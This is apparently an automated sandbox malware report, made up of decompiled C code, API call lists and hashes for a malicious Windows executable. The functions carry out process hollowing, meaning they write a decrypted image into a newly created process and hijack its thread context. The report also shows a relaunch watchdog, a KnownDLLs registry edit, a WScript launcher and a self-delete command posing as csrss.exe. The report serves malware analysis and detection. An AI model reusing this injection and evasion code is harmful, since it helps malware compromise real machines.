                                                                                                        • String ID: " & "$.url$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe$LKBNMTFJgl$ProgramData$cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q "$csrss.exe$viTRMUuKeV$zJ@
                                                                                                        • API String ID: 3724707802-4215802547
                                                                                                        • Opcode ID: 6894e1fd763ebf7c80e388c5e2625915a5104925a43bcd60d952a30ebe1ee402
                                                                                                        • Instruction ID: 401daa4757a0587c7b000174fcf8883a011eebc5c06fd5704f7b7c2f209f5124
                                                                                                        • Opcode Fuzzy Hash: 6894e1fd763ebf7c80e388c5e2625915a5104925a43bcd60d952a30ebe1ee402
                                                                                                        • Instruction Fuzzy Hash: 1C91B9B1E4420876DB20B7A59C06FDB376CAF00745F04007BF904B21D2EA7CBA54CAAE
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405B80, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 237threadsleepprocessCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 84%
                                                                                                        			E00405B80(void* __ebx, void* __ecx, void* __eflags, WCHAR* _a4) {
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void _v28;
				long _v32;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				char _v112;
				struct _CONTEXT _v828;
				intOrPtr _t62;
				void* _t70;
				void* _t72;
				void* _t81;
				void* _t82;
				void* _t84;
				signed int _t85;
				void* _t90;
				void* _t94;
				void* _t95;
				void* _t108;
				void* _t115;
				void* _t117;
				void _t120;
				intOrPtr _t123;
				void* _t126;
				void* _t132;
				void* _t133;
				intOrPtr* _t136;
				void* _t137;
				void* _t138;
				void* _t142;
				void* _t143;

				_t115 = __ebx;
				E00401BB0( &(_v828.Dr0), 0, 0x2c8);
				_v28 = 0;
				_t138 = _t137 + 0xc;
				_v32 = 0;
				_v828.ContextFlags = 0x10007;
				_t142 =  *0x40c038 - 0x5a4d; // 0x6b7d
				if(_t142 == 0) {
					L3:
					_t62 =  *0x40c074; // 0x383538b7
					__eflags =  *((intOrPtr*)(_t62 + 0x40c038)) - 0x4550;
					_t6 = _t62 + 0x40c038; // 0x3875f8ef
					_t126 = _t6;
					if( *((intOrPtr*)(_t62 + 0x40c038)) != 0x4550) {
						L27:
						__eflags = 0;
						return 0;
					} else {
						E00401670( &_v112, 0, 0x44);
						E00401670( &_v20, 0, 0x10);
						_v112 = 0x44;
						__eflags =  *0x5d1bb8;
						_push( &_v20);
						_push( &_v112);
						_push(0);
						_push(0);
						if( *0x5d1bb8 == 0) {
							_push(0x14);
						} else {
							_push(0x800000c);
						}
						_t70 = CreateProcessW(0, _a4, 0, 0, 0, ??, ??, ??, ??, ??);
						__eflags = _t70;
						if(_t70 == 0) {
							goto L27;
						} else {
							_push(_t115);
							_t14 =  &_v16; // 0x4049e6
							_t72 = GetThreadContext( *_t14,  &_v828);
							__eflags = _t72;
							if(_t72 == 0) {
								L26:
								TerminateProcess(_v20, 0);
								CloseHandle(_v16);
								CloseHandle(_v20);
								__eflags = 0;
								return 0;
							} else {
								_t81 = ReadProcessMemory(_v20, _v828.Ebx + 8,  &_v28, 4,  &_v32);
								__eflags = _t81;
								if(_t81 == 0) {
									goto L26;
								} else {
									_t123 =  *((intOrPtr*)(_t126 + 0x34));
									_t120 = _v28;
									__eflags = _t120 - _t123;
									if(__eflags < 0) {
										L13:
										_t82 = E004072C0(__eflags, _v20,  *((intOrPtr*)(_t126 + 0x34)), 0,  *((intOrPtr*)(_t126 + 0x50)), 0x3000, 0x40);
										_t132 = _t82;
										_v24 = _t132;
										__eflags = _t132;
										if(_t132 == 0) {
											goto L26;
										} else {
											asm("cdq");
											_t124 =  &_v36;
											_v44 = _t82;
											_v40 = _t123;
											_t84 = E004074D0(_t82,  &_v36, _v20, _t82, _t123, 0x40c038,  *((intOrPtr*)(_t126 + 0x54)),  &_v36);
											__eflags = _t84;
											if(_t84 == 0) {
												goto L26;
											} else {
												_t85 =  *(_t126 + 0x14) & 0x0000ffff;
												_t117 = 0;
												__eflags = 0 -  *(_t126 + 6);
												if(0 >=  *(_t126 + 6)) {
													L20:
													_t42 = _t126 + 0x34; // 0x3875f923
													_t90 = E004074D0(0, _t124, _v20, _v828.Ebx + 8, 0, _t42, 4,  &_v36);
													__eflags = _t90;
													if(_t90 == 0) {
														goto L26;
													} else {
														_v828.Eax =  *((intOrPtr*)(_t126 + 0x28)) + _t132;
														_t94 = SetThreadContext(_v16,  &_v828);
														__eflags = _t94;
														if(_t94 == 0) {
															goto L26;
														} else {
															_t95 = E004071A0(0, _t124, _v16);
															__eflags = _t95;
															if(_t95 == 0) {
																goto L26;
															} else {
																Sleep(0x1388);
																_t133 = VirtualAlloc(0, 0x138, 0x3000, 4);
																__eflags = _t133;
																if(_t133 != 0) {
																	E00401BB0(_t133, 0, 0x138);
																	E004074D0(0, _t124, _v20, _v44, _v40, _t133, 0x138,  &_v24);
																	VirtualFree(_t133, 0, 0x8000);
																}
																CloseHandle(_v16);
																CloseHandle(_v20);
																return _v12;
															}
														}
													}
												} else {
													_t34 = _t126 + 0x2c; // 0x3875f91b
													_t136 = _t34 + _t85;
													asm("o16 nop [eax+eax]");
													while(1) {
														_t108 = E004074D0(0, _t124, _v20,  *((intOrPtr*)(_t136 - 8)) + _v24, 0,  *_t136 + 0x40c038,  *((intOrPtr*)(_t136 - 4)), 0);
														__eflags = _t108;
														if(_t108 == 0) {
															goto L26;
														}
														_t117 = _t117 + 1;
														_t136 = _t136 + 0x28;
														__eflags = _t117 - ( *(_t126 + 6) & 0x0000ffff);
														if(_t117 < ( *(_t126 + 6) & 0x0000ffff)) {
															continue;
														} else {
															_t132 = _v24;
															goto L20;
														}
														goto L28;
													}
													goto L26;
												}
											}
										}
									} else {
										__eflags = _t120 -  *((intOrPtr*)(_t126 + 0x50)) + _t123;
										if(__eflags > 0) {
											goto L13;
										} else {
											__eflags = E00407120(_t123, _v20, _t120, 0);
											if(__eflags != 0) {
												goto L26;
											} else {
												goto L13;
											}
										}
									}
								}
							}
						}
					}
				} else {
					E00401CE0("0125789244697858", 0x10, 0x40c038, 0xe7c00);
					_t138 = _t138 + 0x10;
					_t143 =  *0x40c038 - 0x5a4d; // 0x6b7d
					if(_t143 == 0) {
						goto L3;
					} else {
						return 0;
					}
				}
				L28:
			}





































                                                                                                        0x00405b80
                                                                                                        0x00405b98
                                                                                                        0x00405ba2
                                                                                                        0x00405ba9
                                                                                                        0x00405bac
                                                                                                        0x00405bb3
                                                                                                        0x00405bbd
                                                                                                        0x00405bc4
                                                                                                        0x00405bef
                                                                                                        0x00405bef
                                                                                                        0x00405bf4
                                                                                                        0x00405bff
                                                                                                        0x00405bff
                                                                                                        0x00405c05
                                                                                                        0x00405e53
                                                                                                        0x00405e54
                                                                                                        0x00405e5a
                                                                                                        0x00405c0b
                                                                                                        0x00405c13
                                                                                                        0x00405c20
                                                                                                        0x00405c28
                                                                                                        0x00405c2f
                                                                                                        0x00405c39
                                                                                                        0x00405c3d
                                                                                                        0x00405c3e
                                                                                                        0x00405c40
                                                                                                        0x00405c42
                                                                                                        0x00405c4b
                                                                                                        0x00405c44
                                                                                                        0x00405c44
                                                                                                        0x00405c44
                                                                                                        0x00405c58
                                                                                                        0x00405c5e
                                                                                                        0x00405c60
                                                                                                        0x00000000
                                                                                                        0x00405c66
                                                                                                        0x00405c66
                                                                                                        0x00405c6e
                                                                                                        0x00405c71
                                                                                                        0x00405c77
                                                                                                        0x00405c79
                                                                                                        0x00405e2f
                                                                                                        0x00405e34
                                                                                                        0x00405e43
                                                                                                        0x00405e48
                                                                                                        0x00405e4c
                                                                                                        0x00405e52
                                                                                                        0x00405c7f
                                                                                                        0x00405c96
                                                                                                        0x00405c9c
                                                                                                        0x00405c9e
                                                                                                        0x00000000
                                                                                                        0x00405ca4
                                                                                                        0x00405ca4
                                                                                                        0x00405ca7
                                                                                                        0x00405caa
                                                                                                        0x00405cac
                                                                                                        0x00405cca
                                                                                                        0x00405cdc
                                                                                                        0x00405ce1
                                                                                                        0x00405ce3
                                                                                                        0x00405ce6
                                                                                                        0x00405ce8
                                                                                                        0x00000000
                                                                                                        0x00405cee
                                                                                                        0x00405cee
                                                                                                        0x00405cf3
                                                                                                        0x00405cf6
                                                                                                        0x00405cfd
                                                                                                        0x00405d0a
                                                                                                        0x00405d0f
                                                                                                        0x00405d11
                                                                                                        0x00000000
                                                                                                        0x00405d17
                                                                                                        0x00405d17
                                                                                                        0x00405d1d
                                                                                                        0x00405d1f
                                                                                                        0x00405d23
                                                                                                        0x00405d65
                                                                                                        0x00405d6b
                                                                                                        0x00405d7e
                                                                                                        0x00405d83
                                                                                                        0x00405d85
                                                                                                        0x00000000
                                                                                                        0x00405d8b
                                                                                                        0x00405d90
                                                                                                        0x00405da0
                                                                                                        0x00405da6
                                                                                                        0x00405da8
                                                                                                        0x00000000
                                                                                                        0x00405dae
                                                                                                        0x00405db1
                                                                                                        0x00405db6
                                                                                                        0x00405db8
                                                                                                        0x00000000
                                                                                                        0x00405dba
                                                                                                        0x00405dbf
                                                                                                        0x00405dd9
                                                                                                        0x00405ddb
                                                                                                        0x00405ddd
                                                                                                        0x00405de7
                                                                                                        0x00405e02
                                                                                                        0x00405e0f
                                                                                                        0x00405e0f
                                                                                                        0x00405e1e
                                                                                                        0x00405e23
                                                                                                        0x00405e2e
                                                                                                        0x00405e2e
                                                                                                        0x00405db8
                                                                                                        0x00405da8
                                                                                                        0x00405d25
                                                                                                        0x00405d25
                                                                                                        0x00405d28
                                                                                                        0x00405d2a
                                                                                                        0x00405d30
                                                                                                        0x00405d49
                                                                                                        0x00405d4e
                                                                                                        0x00405d50
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405d5a
                                                                                                        0x00405d5b
                                                                                                        0x00405d5e
                                                                                                        0x00405d60
                                                                                                        0x00000000
                                                                                                        0x00405d62
                                                                                                        0x00405d62
                                                                                                        0x00000000
                                                                                                        0x00405d62
                                                                                                        0x00000000
                                                                                                        0x00405d60
                                                                                                        0x00000000
                                                                                                        0x00405d30
                                                                                                        0x00405d23
                                                                                                        0x00405d11
                                                                                                        0x00405cae
                                                                                                        0x00405cb3
                                                                                                        0x00405cb5
                                                                                                        0x00000000
                                                                                                        0x00405cb7
                                                                                                        0x00405cc2
                                                                                                        0x00405cc4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405cc4
                                                                                                        0x00405cb5
                                                                                                        0x00405cac
                                                                                                        0x00405c9e
                                                                                                        0x00405c79
                                                                                                        0x00405c60
                                                                                                        0x00405bc6
                                                                                                        0x00405bd7
                                                                                                        0x00405bdc
                                                                                                        0x00405bdf
                                                                                                        0x00405be6
                                                                                                        0x00000000
                                                                                                        0x00405be8
                                                                                                        0x00405bee
                                                                                                        0x00405bee
                                                                                                        0x00405be6
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNEL32 ref: 00405C58
                                                                                                        • GetThreadContext.KERNEL32(I@,00010007,00000000,?,?,?,?,?,I@,?,?,?), ref: 00405C71
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,?,?,?,I@,?,?,?), ref: 00405C96
                                                                                                        • SetThreadContext.KERNEL32(?,?,?,?,00000000,3875F923,00000004,?,?,00000000,?,0040C038,?,?,?,?), ref: 00405DA0
                                                                                                        • Sleep.KERNEL32(00001388,?,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405DBF
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405DD3
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00000000,00000138,?,?,00003000,00000040), ref: 00405E0F
                                                                                                        • CloseHandle.KERNEL32(?,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405E1E
                                                                                                        • CloseHandle.KERNEL32(?,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 00405E23
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseContextHandleProcessThreadVirtual$AllocCreateFreeMemoryReadSleep
                                                                                                        • String ID: 0125789244697858$D$I@$I@
                                                                                                        • API String ID: 1428767187-3701513222
                                                                                                        • Opcode ID: 534cd3dfdfd28f86ae93a3f14db949cd784872d79c8532d27548abca3d40672f
                                                                                                        • Instruction ID: 2b955a6b4a58cd15ef933bbb3afc0f250c4904853c31c428a9eccdac0ead69e9
                                                                                                        • Opcode Fuzzy Hash: 534cd3dfdfd28f86ae93a3f14db949cd784872d79c8532d27548abca3d40672f
                                                                                                        • Instruction Fuzzy Hash: 91819071A40619ABEB109B90DD46FAFB7B8FB04704F044176FA04B62D0E775AA50CB98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405A50, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 117memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 57%
                                                                                                        			E00405A50(void* __ecx, void* _a4, void* _a8, long* _a12, char _a16) {
				void* _v8;
				void* _t31;
				int _t32;
				int _t36;
				void* _t44;
				long _t46;
				void* _t56;
				void* _t60;

				 *_a12 = 0;
				_t2 =  &_a16; // 0x40563b
				 *( *_t2) = 0;
				_t56 = VirtualAlloc(0, 0x40, 0x3000, 4);
				if(_t56 == 0) {
					L3:
					return 0;
				} else {
					if(ReadProcessMemory(_a4, _a8, _t56, 0x40, 0) != 0) {
						if( *_t56 != 0x5a4d) {
							goto L2;
						} else {
							_v8 =  *((intOrPtr*)(_t56 + 0x3c));
							VirtualFree(_t56, 0, 0x8000);
							_t44 = VirtualAlloc(0, 0x18, 0x3000, 4);
							if(_t44 == 0) {
								L11:
								return 0;
							} else {
								_t31 = _a8 + _v8;
								_v8 = _t31;
								_t32 = ReadProcessMemory(_a4, _t31, _t44, 0x18, 0);
								_push(0x8000);
								_push(0);
								_push(_t44);
								if(_t32 == 0 ||  *_t44 != 0x4550) {
									L10:
									VirtualFree();
									goto L11;
								} else {
									VirtualFree();
									_t46 = ( *(_t44 + 0x14) & 0x0000ffff) + 0x18;
									_t60 = VirtualAlloc(0, _t46, 0x3000, 4);
									if(_t60 == 0) {
										goto L11;
									} else {
										_t36 = ReadProcessMemory(_a4, _v8, _t60, _t46, 0);
										_push(0x8000);
										_push(0);
										_push(_t60);
										if(_t36 != 0) {
											if( *_t60 != 0x4550) {
												goto L10;
											} else {
												 *_a12 =  *(_t60 + 0x50);
												_t17 =  &_a16; // 0x40563b
												 *((intOrPtr*)( *_t17)) =  *((intOrPtr*)(_t60 + 0x28));
												VirtualFree(??, ??, ??);
												return 1;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					} else {
						L2:
						VirtualFree(_t56, 0, 0x8000);
						goto L3;
					}
				}
			}











                                                                                                        0x00405a61
                                                                                                        0x00405a67
                                                                                                        0x00405a73
                                                                                                        0x00405a7b
                                                                                                        0x00405a7f
                                                                                                        0x00405aa4
                                                                                                        0x00405aab
                                                                                                        0x00405a81
                                                                                                        0x00405a94
                                                                                                        0x00405ab4
                                                                                                        0x00000000
                                                                                                        0x00405ab6
                                                                                                        0x00405ac8
                                                                                                        0x00405acb
                                                                                                        0x00405ada
                                                                                                        0x00405ade
                                                                                                        0x00405b49
                                                                                                        0x00405b51
                                                                                                        0x00405ae0
                                                                                                        0x00405ae3
                                                                                                        0x00405aef
                                                                                                        0x00405af2
                                                                                                        0x00405af8
                                                                                                        0x00405afd
                                                                                                        0x00405aff
                                                                                                        0x00405b02
                                                                                                        0x00405b47
                                                                                                        0x00405b47
                                                                                                        0x00000000
                                                                                                        0x00405b0c
                                                                                                        0x00405b10
                                                                                                        0x00405b19
                                                                                                        0x00405b25
                                                                                                        0x00405b29
                                                                                                        0x00000000
                                                                                                        0x00405b2b
                                                                                                        0x00405b35
                                                                                                        0x00405b3b
                                                                                                        0x00405b40
                                                                                                        0x00405b42
                                                                                                        0x00405b45
                                                                                                        0x00405b58
                                                                                                        0x00000000
                                                                                                        0x00405b5a
                                                                                                        0x00405b60
                                                                                                        0x00405b62
                                                                                                        0x00405b68
                                                                                                        0x00405b6a
                                                                                                        0x00405b74
                                                                                                        0x00405b74
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405b45
                                                                                                        0x00405b29
                                                                                                        0x00405b02
                                                                                                        0x00405ade
                                                                                                        0x00405a96
                                                                                                        0x00405a96
                                                                                                        0x00405a9e
                                                                                                        0x00000000
                                                                                                        0x00405a9e
                                                                                                        0x00405a94

                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004,00005A4D,75145B60,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405A79
                                                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000040,00000000,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405A8C
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405A9E
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,I@,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405ACB
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405AD8
                                                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000018,00000000,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405AF2
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405B10
                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405B1F
                                                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,0040563B,?,00000000,00000000,00000000), ref: 00405B35
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405B47
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00405B6A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$Free$AllocMemoryProcessRead
                                                                                                        • String ID: ;V@$I@
                                                                                                        • API String ID: 1260273505-1952863460
                                                                                                        • Opcode ID: f26b90b78254076905d6d2fbb5c08ebbfb30092b78da21401849fee9cabb9fdf
                                                                                                        • Instruction ID: 663560f153661f58489f41854f68c215dbd6861c452647dabd8b659e9ddec512
                                                                                                        • Opcode Fuzzy Hash: f26b90b78254076905d6d2fbb5c08ebbfb30092b78da21401849fee9cabb9fdf
                                                                                                        • Instruction Fuzzy Hash: C4314F71741714BBEB309F95DC41F9B7BA8EB05B11F100065FB04AB2D1D6B5AD008FA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004082B0, Relevance: 13.6, APIs: 9, Instructions: 75COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 78%
                                                                                                        			E004082B0(intOrPtr _a4) {
				void* _v8;
				long _v12;
				void* _t20;
				void* _t27;
				void* _t34;
				void* _t37;
				void* _t38;

				_v8 = 0;
				_v12 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) == 0) {
					L4:
					return 0;
				} else {
					if(GetTokenInformation(_v8, 1, 0, 0,  &_v12) != 0 || GetLastError() == 0x7a) {
						_t20 = E004015E0(_v12);
						_t38 = _t37 + 4;
						_t34 = _t20;
						if(GetTokenInformation(_v8, 1, _t34, _v12,  &_v12) == 0 || IsValidSid( *_t34) == 0) {
							_push(_t34);
							goto L8;
						} else {
							_t27 = E00407AA0( *_t34, _a4);
							_t38 = _t38 + 8;
							_push(_t34);
							if(_t27 == 0) {
								L8:
								E00401510();
								CloseHandle(_v8);
								return 0;
							} else {
								E00401510();
								CloseHandle(_v8);
								return 1;
							}
						}
					} else {
						CloseHandle(_v8);
						goto L4;
					}
				}
			}










                                                                                                        0x004082b9
                                                                                                        0x004082c3
                                                                                                        0x004082d9
                                                                                                        0x00408306
                                                                                                        0x0040830b
                                                                                                        0x004082db
                                                                                                        0x004082f0
                                                                                                        0x00408310
                                                                                                        0x00408315
                                                                                                        0x00408318
                                                                                                        0x0040832f
                                                                                                        0x0040833d
                                                                                                        0x00000000
                                                                                                        0x00408356
                                                                                                        0x0040835b
                                                                                                        0x00408360
                                                                                                        0x00408363
                                                                                                        0x00408366
                                                                                                        0x0040833e
                                                                                                        0x0040833e
                                                                                                        0x00408349
                                                                                                        0x00408355
                                                                                                        0x00408368
                                                                                                        0x00408368
                                                                                                        0x00408373
                                                                                                        0x00408382
                                                                                                        0x00408382
                                                                                                        0x00408366
                                                                                                        0x004082fd
                                                                                                        0x00408300
                                                                                                        0x00000000
                                                                                                        0x00408300
                                                                                                        0x004082f0

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000400), ref: 004082CA
                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004082D1
                                                                                                        • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 004082E8
                                                                                                        • GetLastError.KERNEL32 ref: 004082F2
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408300
                                                                                                        • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000), ref: 00408327
                                                                                                        • IsValidSid.ADVAPI32(00000000), ref: 00408333
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408349
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408373
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleToken$InformationProcess$CurrentErrorLastOpenValid
                                                                                                        • String ID:
                                                                                                        • API String ID: 2832165296-0
                                                                                                        • Opcode ID: b5a0d24f3340db2a52b6e5b72ce1261ad8fa07ef55d193fc80752f6946e3dc09
                                                                                                        • Instruction ID: 6c80d8c1505064fb5d23a14c91f2f6bbea28928c87bc453829ba29e9ce75709a
                                                                                                        • Opcode Fuzzy Hash: b5a0d24f3340db2a52b6e5b72ce1261ad8fa07ef55d193fc80752f6946e3dc09
                                                                                                        • Instruction Fuzzy Hash: F5215E31A00108FBEF116FA0EE0AB9E7FB9EF54745F1000B5F945F51A1EB768E109A99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408390, Relevance: 13.6, APIs: 9, Instructions: 65threadsleepprocessCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 84%
                                                                                                        			E00408390(long* _a4) {
				long _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				void* _t35;

				_t35 = OpenProcess(0x1000, 0,  *_a4);
				if(_t35 == 0) {
					ExitThread(0);
				}
				while(1) {
					_v8 = 0;
					if(GetExitCodeProcess(_t35,  &_v8) == 0 || (0 | _v8 == 0x00000103) == 0) {
						break;
					}
					Sleep(0x7d0);
				}
				CloseHandle(_t35);
				E00401BB0( &_v92, 0, 0x44);
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x14], xmm0");
				CreateProcessW( &(_a4[1]), 0, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
				CloseHandle(_v24.hThread);
				CloseHandle(_v24);
				ExitThread(_v24.dwProcessId);
			}







                                                                                                        0x004083ab
                                                                                                        0x004083af
                                                                                                        0x00408447
                                                                                                        0x00408447
                                                                                                        0x004083c1
                                                                                                        0x004083c4
                                                                                                        0x004083d1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004083e8
                                                                                                        0x004083e8
                                                                                                        0x004083f3
                                                                                                        0x004083fd
                                                                                                        0x00408408
                                                                                                        0x0040840b
                                                                                                        0x0040842c
                                                                                                        0x00408435
                                                                                                        0x0040843a
                                                                                                        0x0040843f

                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004083A5
                                                                                                        • GetExitCodeProcess.KERNEL32 ref: 004083CD
                                                                                                        • Sleep.KERNEL32(000007D0), ref: 004083E8
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004083F3
                                                                                                        • CreateProcessW.KERNEL32 ref: 0040842C
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00408435
                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040843A
                                                                                                        • ExitThread.KERNEL32 ref: 0040843F
                                                                                                        • ExitThread.KERNEL32 ref: 00408447
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseExitHandleProcess$Thread$CodeCreateOpenSleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 1465093181-0
                                                                                                        • Opcode ID: fbe44c1088de2dd18943f42bff4359acb9e52e68f53b43e8eab5e7423105ac84
                                                                                                        • Instruction ID: 538b4140d65d2fd151ab259c2702cab8e281b3ea1c27d0cfeab488a6800ad3c5
                                                                                                        • Opcode Fuzzy Hash: fbe44c1088de2dd18943f42bff4359acb9e52e68f53b43e8eab5e7423105ac84
                                                                                                        • Instruction Fuzzy Hash: 64114971A40319BBEB11DBA4DE45F9F7B78AF04741F140025B604BA1D1DBB4AE40CB99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402DD0, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 29registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00402DD0(void* __ecx) {
				void* _v8;
				long _t8;

				_t1 =  &_v8; // 0x402f21
				_v8 = 0;
				_t8 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs", 0, 0xf003f, _t1);
				if(_t8 == 0) {
					RegSetValueExW(_v8, L"ntdll", 0, 1, L"ntdll.dll", 2 + E00401B40(L"ntdll.dll") * 2);
					return RegCloseKey(_v8);
				}
				return _t8;
			}





                                                                                                        0x00402dd4
                                                                                                        0x00402dd7
                                                                                                        0x00402df0
                                                                                                        0x00402df8
                                                                                                        0x00402e20
                                                                                                        0x00000000
                                                                                                        0x00402e29
                                                                                                        0x00402e32

                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs,00000000,000F003F,!/@), ref: 00402DF0
                                                                                                        • RegSetValueExW.ADVAPI32(00000000,ntdll,00000000,00000001,ntdll.dll,00000000), ref: 00402E20
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402E29
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenValue
                                                                                                        • String ID: !/@$SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs$ntdll$ntdll.dll
                                                                                                        • API String ID: 779948276-871150387
                                                                                                        • Opcode ID: 2ac2e1f2ae53ea3f65214954049f4d68d98ab157eba3ad612de933165087b6f9
                                                                                                        • Instruction ID: 484440f86f87c03b30c3bb65dbd638c5ca07b71e5d6230add0e59dd50d7b01eb
                                                                                                        • Opcode Fuzzy Hash: 2ac2e1f2ae53ea3f65214954049f4d68d98ab157eba3ad612de933165087b6f9
                                                                                                        • Instruction Fuzzy Hash: E6F0A071680208BBEB119B91DE0BFAA7678E744B04F200076FA01B11E2E6B56E14D648
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406CA0, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49threadprocessCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 79%
                                                                                                        			E00406CA0(intOrPtr _a4) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				short _v1128;
				long _t25;

				E00401BB0( &_v88, 0, 0x44);
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x10], xmm0");
				E00401A00( &_v1128, L"cmd.exe /C WScript \"");
				E00401970( &_v1128, _a4 - 0xffffff80);
				E00401970( &_v1128, "\"");
				_t25 = CreateProcessW(0,  &_v1128, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
				if(_t25 != 0) {
					CloseHandle(_v20.hThread);
					CloseHandle(_v20);
					ExitThread(_v20.dwProcessId);
				}
				ExitThread(_t25);
			}







                                                                                                        0x00406cb1
                                                                                                        0x00406cbc
                                                                                                        0x00406cc5
                                                                                                        0x00406cc9
                                                                                                        0x00406cdc
